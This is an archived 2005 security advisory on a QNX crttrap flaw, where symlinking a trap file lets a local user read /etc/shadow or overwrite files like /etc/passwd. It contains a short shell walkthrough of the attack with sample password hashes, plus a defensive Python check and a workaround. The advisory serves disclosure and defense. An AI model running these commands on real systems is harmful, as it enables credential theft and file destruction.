[UNIX] QNX Crrtrap Arbitrary File Read/Write Vulnerability

Subject: [UNIX] QNX Crrtrap Arbitrary File Read/Write Vulnerability
Date: 10 Jan 2005 15:20:14 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com


  QNX Crrtrap Arbitrary File Read/Write Vulnerability
------------------------------------------------------------------------


SUMMARY

crttrap is "a tool used by QNX to detect video hardware and start the 
correct driver for QNX" (http://www.qnx.com). crttrap has a '-c' flag to 
specify where the trap file will be written. Combined with the 'trap' command 
it is possible to read or write any file on the disk.

DETAILS

By default crttrap writes and reads trap files found in 
"/etc/system/config". This directory is owned by root, so an unprivileged 
user has no permission to write to it. The crttrap program filters "../" to 
prevent directory traversal vulnerabilities. However, it doesn't check for "/" 
(without any dots). This makes it possible to create a sub directory whose 
permission settings are bound to our (non-root) group.

Once such a directory exists, we can now manipulate our trap file:
$ crttrap -c tmp/rfdslabs trap
/usr/photon/bin/devgt-iographics -dldevg-svga.so -I0 -d0x5333, 0x8c12
/usr/photon/bin/devgt-iographics -dldevg-vesabios.so -I0 -d0x5333, 0x8c12
crttrap: wrote config file as /etc/system/config/tmp/rfdslabs
$ cd /etc/system/config/tmp
$ ls -la
total 52
drwxrwxr-x    2 root 100         2048 Dec 11 12:40 .
drwxrwxr-x    3 root root        2048 Dec 11 12:35 ..
-rw-r--r--    1 root 100        21671 Dec 11 12:40 rfdslabs

$ rm -f rfdslabs
$ ln -s /etc/shadow rfdslabs
$ crttrap -c tmp/rfdslabs dump
root:21QjUKxP9gEJK:0:0:0
sandimas:91UzHxvt3x1n2:0:0:0

We are also able to overwrite any file with the 'trap' command. As an example, 
an attacker can corrupt '/etc/passwd' and make login attempts fail every 
time.
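The lesson of the advisory is that stripping "../" is not a containment check: a symlink planted in a writable subdirectory passes the filter and points the setuid program at /etc/shadow. As an added illustration (not the advisory's or QNX's code), the Python below contrasts the string filter described above with a check that resolves symlinks before testing containment, using a scratch directory that stands in for /etc/system/config and /etc/shadow.

```python
import os
import tempfile
from typing import Optional


def naive_filter_passes(name: str) -> bool:
    """Mimics the check the advisory describes: only '../' is rejected."""
    return "../" not in name


def confined_path(base: str, name: str) -> Optional[str]:
    """Return the resolved path of base/name if it stays inside base, else None.

    Symlinks are resolved before the containment test, so a link placed in a
    group-writable subdirectory (the advisory's tmp/rfdslabs -> /etc/shadow
    trick) is rejected even though the string contains no '..' at all.
    """
    if os.path.isabs(name) or any(part == ".." for part in name.split("/")):
        return None
    real_base = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(real_base, name))
    # Test containment on the resolved path, not on the string the caller gave us.
    if candidate != real_base and not candidate.startswith(real_base + os.sep):
        return None
    # A real fix would also open the result with O_NOFOLLOW (or drop privileges)
    # so the symlink cannot be swapped in between this check and the open().
    return candidate


def demo() -> dict:
    """Rebuilds the advisory's layout in a constructed scratch directory."""
    with tempfile.TemporaryDirectory() as root:
        base = os.path.join(root, "config")          # stands in for /etc/system/config
        os.makedirs(os.path.join(base, "tmp"))       # the attacker's writable subdirectory
        secret = os.path.join(root, "shadow")        # stands in for /etc/shadow
        open(secret, "w").close()
        name = "tmp/rfdslabs"
        plain_ok = confined_path(base, name) is not None   # ordinary trap file: allowed
        os.symlink(secret, os.path.join(base, name))       # now make it the advisory's symlink
        return {
            "naive_passes": naive_filter_passes(name),     # the "../" filter lets it through
            "strict_result": confined_path(base, name),    # resolved check rejects it
            "plain_file_allowed": plain_ok,
        }
```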

PS: On 31 May 2002, Simon Oullette found a bug in the crttrap '-c' flag in 
QNX 4.25. But his exploitation technique won't work with the newest versions, 
because crttrap now only opens "/etc/system/config" and its sub directories.

Workaround:
We suggest that you remove crttrap's suid bit until QNX releases a patch.

Timeline:
10 Dec 2004: Vulnerability detected
11 Dec 2004: Advisory written; rfdslabs contacts QNX
20 Dec 2004: QNX replies to rfdslabs
28 Dec 2004: Advisory released to public


ADDITIONAL INFORMATION

The information has been provided by Julio Cesar Fort (julio@rfdslabs.com.br).


